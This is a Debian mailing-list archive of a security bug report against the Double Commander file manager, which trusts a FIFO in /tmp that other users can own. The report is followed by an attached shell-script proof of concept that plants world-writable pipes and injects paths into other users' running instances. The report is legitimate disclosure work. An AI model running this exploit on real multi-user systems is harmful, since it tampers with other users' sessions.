[Pkg-pascal-devel] Bug#926223: doublecmd-gtk: insecure use of /tmp

Jakub Wilk jwilk at jwilk.net
Tue Apr 2 10:32:31 BST 2019


Package: doublecmd-gtk
Version: 0.9.1-1
Tags: security

Double Commander uses /tmp/doublecmd--<uid> for communication, even when 
this file is owned by another user.

Local attacker could exploit this to load paths into other users' 
panels. Proof-of-concept exploit is attached.

Please move the communication pipe out of /tmp.


-- System Information:
Architecture: i386

-- 
Jakub Wilk
-------------- next part --------------
#!/bin/sh
set -e -u
cd /tmp
getent passwd | while IFS=: read -r user _ uid _
do
    fifo="doublecmd--$uid"
    rm -f "$fifo" || true  # maybe stale fifo from the previous exploit run?
    if ! mkfifo -m 666 "$fifo"
    then
        printf 'Failed to mount the exploit against %s; Maybe try again later?\n' "$user"
        continue
    fi
done
while true
do
    for uid in $(ps --no-headers -C doublecmd -o uid)
    do
        sleep 1
        fifo="doublecmd--$uid"
        path=$(find /bin /sbin /usr/bin /usr/sbin /usr/games | shuf -n 1)
        len=${#path}
        pad=$((1024-len))
        {
            printf '\1\5\20\0\0\5\20\0\0\0\1%02050d' | tr '0' '\0'
            printf '%s' "$path"
            printf "%0${pad}d\1%01024d" | tr '0' '\0'
        } > "$fifo"
    done
    sleep 1
done


More information about the Pkg-pascal-devel mailing list